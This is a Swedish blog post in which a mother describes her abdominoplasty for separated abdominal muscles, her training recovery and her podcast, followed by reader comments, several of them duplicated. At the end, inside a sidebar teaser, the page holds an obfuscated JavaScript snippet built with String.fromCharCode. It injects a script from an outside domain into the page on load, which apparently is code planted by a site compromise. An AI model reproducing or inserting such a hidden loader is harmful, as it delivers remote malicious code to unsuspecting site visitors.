Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

Multi Mammornas senaste poddavsnitt! Bukplastik före och efter bilder!

image210

 

Hej fina!

I detta inlägget förekommer REKLAM för våran egna podd! 

VARNAR KÄNSLIGA LÄSARE FÖR OBEHAGLIGA BILDER FRÅN OPERATION!

I veckans avsnitt i våran podd MULTI MAMMORNA pratar vi om det för många tabubelagda ämnet Plastikoperationer. För många handlar det om det estetiska, det ytliga och det vi oftast inte vågar står för. För mig handlar det funktionellt. Här ser du FÖRE bilder på min mage. Efter viktnedgång. (Träning och kost) 

Läs mitt första inlägg inför bukplastiken HÄR. Jag hade en diastas. Dvs delade bukmuskler efter graviditet.

Jag visste inte ens om vad detta var. När jag gjorde min viktresa på egenhand nerifrån drygt 100kg så varvade jag min träning, utan PT. Men som gröngöling på gymmet så saknade jag kunskap. Efter 2 år så tog jag hjälp av en PT.

Jag kände inte till att jag hade en diasats. Jag visste inte vad det var. Jag tränades väldigt hårt, jag gick nästan sönder på kuppen. Jag klarade inte av att resa mig ur sängen utan att använda mina armar. Detta var jag så van vid att jag inte reflekterade övers det.

Poängen är att min bål var för svag, just pga av delningen. Jag byte PT, fick hjälp och han konstaterade snabbt at min delning var stor. Jag kontaktade då x-antal läkare och gjorde x-antal konsultationer. Tillslut hittade jag Dr Tuve som jag senare lät operera mig. Det var de BÄSTA jag gjort. Som du ser var min mage skrynklig, och ärrad.

DET var inte min huvudanledning till operation. Jag ville kunna ta min ränning till nästa nivå. Min bålstabilitet var så svag att det begränsade träningen enormt! Detta är bla vad vi pratar om i senaste poddavsnittut sm ligger ute nu.. 

image410

Bilder från ca en dag efter operationen.. 

image136 image138

Bild EFTER operation ca 6 månader. Med sjukt ful solbränna.. men jag hade gördel på mig när jag solade, både för att det ingick i rehab men också för att skydda ärr.

 Läkningen tog ganska lång tid. Jag fick mindre komplikation. Men jag saknade fordrande kunskapen om HUR jag skulle bygga upp min styrka igen. Jag famlade runt i mörker och gjorde vad jag trodde var rätt.

 

IMG_5532

 

Att föda barn är det BÄSTA som har hänt mig!

Man ska vara stolt över sin kropp! Jag älskar min kropp både med och utan ärr. Både med och utan trivselkilon. Men att inte vara helt funktionell, DET tyckte jag inte om! jag hade turen att man kunde göra nånting åt det, och är grymt nöjd med att jag valde att göra det. Jag velade fram och tillbaka innan jag vågade ta beslutet, men har inte ångrat det en sekund! 

Min ärrade mage och min långa väg tillbaka har aldrig varit någonting jag ångrat eller beklagat mig över. Det skulle jag göra om, alla dagar i veckan. Nu idag så har jag sedan ca 8månader ”börjat om” vad det gäller träningen av in bål igen.

Under Pt utbildningen öpnade sig en helt ny värd för mig. Logiska saker började falla på sin plats. Jag fick en riktig aha-upplevelse!

Därför har jag valt att nischa in mig på mamma/gravid träning. just för att det är SÅ vanligt, och för att vi är så många som inte känner till detta. Min delning innan operation uppskattade man till ca 6.5-7cm. Efter operation konstaterade att den var nästan 9cm. Jag som med min första PT fick program som innehäll både plankan och andra alldeles för grymma magövningar bröt bara ner mig själv. Jag visste inte, det gjorde inte helöre PTn (?!!!) Jag gick även på en mamma-gravid utbildning innan jul.  Jag kommer gå steg två nu i vår och då bli licensierad mamma-gravid träning.

Jag brinner för ämnet och älskar att jobba med människor som vill göra en livstidsförändring och vill mer än gärna träna mammor både innan, UNDER och efter graviditet! Ett helt eget inlägg om det kommer i ett senare inlägg… 

MG_0316-3

Vi pratar inte bara om min operation utan även mina bloggkollega Åza har även hon väldigt nyligen gjort en operaton. En ”skinnflärp” som hon kallar det. Inget ansiktslyft, men inte långt därifrån. Läs om hennes känslor, om henne beslut kring detta HÄR  

Vad det gäller ytligheter och hur det påverkar oss är någonting som många inte vågar eller vill prata om. Många väljer att inte stå för det. Jag fattar verkligen inte varför? Jag anser att idag 2017, så har vi kommit långt inom skönhetsbrachen. Jag förespråkar INTE plastikoperationer. Men jag är heller inte emot det. Det viktigaste för mig är att man gör det för sin egen skull. Inte för någon annans skull.

Min operation fick mig att må bättre. På både in och utsidan.

Jag tränar som FAN just nu för att bli stark i bålen. i ca 85% av alla övningar som jag gör så behöver jag en stark bål. Tex en knäböj, om jag inte klarar av att hålla båltrycket så faller jag garanterat framåt och kompenserar då istället med ryggen. Nu idag så FÖRSTÅR jag hur allting händer ihop… UNDERBAR känsla. I wellness träningsbranschen så kan man aldrig bli fullärd.  

Så ge mig något år till sen är nog min mage starkare än någonsin 😉 hehe!

Skämtosido, fråga mig om du vill… jag ska försöka svara så gott jag kan. In och LYSSNA på vårat poddavsnitt på I LIKE RADIO,  HÄR 

image

Kram My Martens

30 Komentarer

 1. Hej bara en nyfiken fråga, hur påverkas magen av din viktuppgång? Blir den ”sladdrig” igen när du går ner?
  Man ser inte på bilderna att du lagt på dig. Tycker du är jättefin.
  Kram

 2. Hej bara en nyfiken fråga, hur påverkas magen av din viktuppgång? Blir den ”sladdrig” igen när du går ner?
  Man ser inte på bilderna att du lagt på dig. Tycker du är jättefin.
  Kram

 3. Jag gillar din blogg, men börja tycka att du tjatar om din operation . Känns som jag läst om det ett xantal ggr.

  • Nu är det veckans tema och veckans ämne i våran poddcast, många nya lösare och lyssnare som efterfrågar detta… Så för dig som redan läst detta så är det bara att skroll förbi ?

 4. Intressant läsning. Min mage putar ALLTID ut och jag vet inte om jag har en delning?
  Ska man inte göra plankan? Förstod inte helt om du är för eller emot? ?

 5. Jag gillar din blogg, men börja tycka att du tjatar om din operation . Känns som jag läst om det ett xantal ggr.

  • Nu är det veckans tema och veckans ämne i våran poddcast, många nya lösare och lyssnare som efterfrågar detta… Så för dig som redan läst detta så är det bara att skroll förbi 😀

 6. Intressant läsning. Min mage putar ALLTID ut och jag vet inte om jag har en delning?

  Ska man inte göra plankan? Förstod inte helt om du är för eller emot? 🙂

 7. Absolut helt okej i mina ögon att återställa sin kropp.
  Det är när det går till överdrift som jag själv inte tycker att det är okej. Folk som lägger in 1000cc i brösten, förstorar läpparna så dom inte kan prata eller gör om sig för att likna Barbie.
  Jag själv har gjort boobsen för några år sen då dom försvann helt efter att ha ammat 4 barn.
  För mig var det att återställa, kunna bära upp ett Linne på sommaren utan att det hamnade under brösten.
  Din mage blev så fin och jag förstår att du inte ångrar dig en sekund ?
  Kramis

 8. Absolut helt okej i mina ögon att återställa sin kropp.
  Det är när det går till överdrift som jag själv inte tycker att det är okej. Folk som lägger in 1000cc i brösten, förstorar läpparna så dom inte kan prata eller gör om sig för att likna Barbie.

  Jag själv har gjort boobsen för några år sen då dom försvann helt efter att ha ammat 4 barn.
  För mig var det att återställa, kunna bära upp ett Linne på sommaren utan att det hamnade under brösten.

  Din mage blev så fin och jag förstår att du inte ångrar dig en sekund 😍
  Kramis

 9. Hej My!
  Jag tycker eran podd är jätte bra!! Ser fram emot varje söndag då den släpps. ?
  Jag tycker du är stark som visar dessa foton.
  Ha det gott!
  Med vänlig hälsning Lisse

 10. Hej My!

  Jag tycker eran podd är jätte bra!! Ser fram emot varje söndag då den släpps. 🙂
  Jag tycker du är stark som visar dessa foton.
  Ha det gott!
  Med vänlig hälsning Lisse

 11. Hej!
  Jag är helt ny läsare av din blogg och blev sååå glad över att läsa om din operation! Jag själv har en bokad tid för samma operation om 2 veckor och är väldigt nervös (kan tillägga att jag bokade om tiden för ca 1 månad sedan pga av nervositet) Jag har inte lyckats hitta ngn som kunnat berätta om en sån här operation innan. Måste fråga hur länge du hade ont och inte kunde utföra ”dagliga” sysslor? Jag har två barn hemma under 3 år som måste tas hand om ?
  Jag ska även lyfta och förstora brösten samtidigt, tror du det blir tufft för mig?
  Tack för ett super inlägg!
  Blir jätte glad om du hinner svara mig <3

 12. Hej!
  Jag är helt ny läsare av din blogg och blev sååå glad över att läsa om din operation! Jag själv har en bokad tid för samma operation om 2 veckor och är väldigt nervös (kan tillägga att jag bokade om tiden för ca 1 månad sedan pga av nervositet) Jag har inte lyckats hitta ngn som kunnat berätta om en sån här operation innan. Måste fråga hur länge du hade ont och inte kunde utföra ”dagliga” sysslor? Jag har två barn hemma under 3 år som måste tas hand om 😉
  Jag ska även lyfta och förstora brösten samtidigt, tror du det blir tufft för mig?
  Tack för ett super inlägg!
  Blir jätte glad om du hinner svara mig <3

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/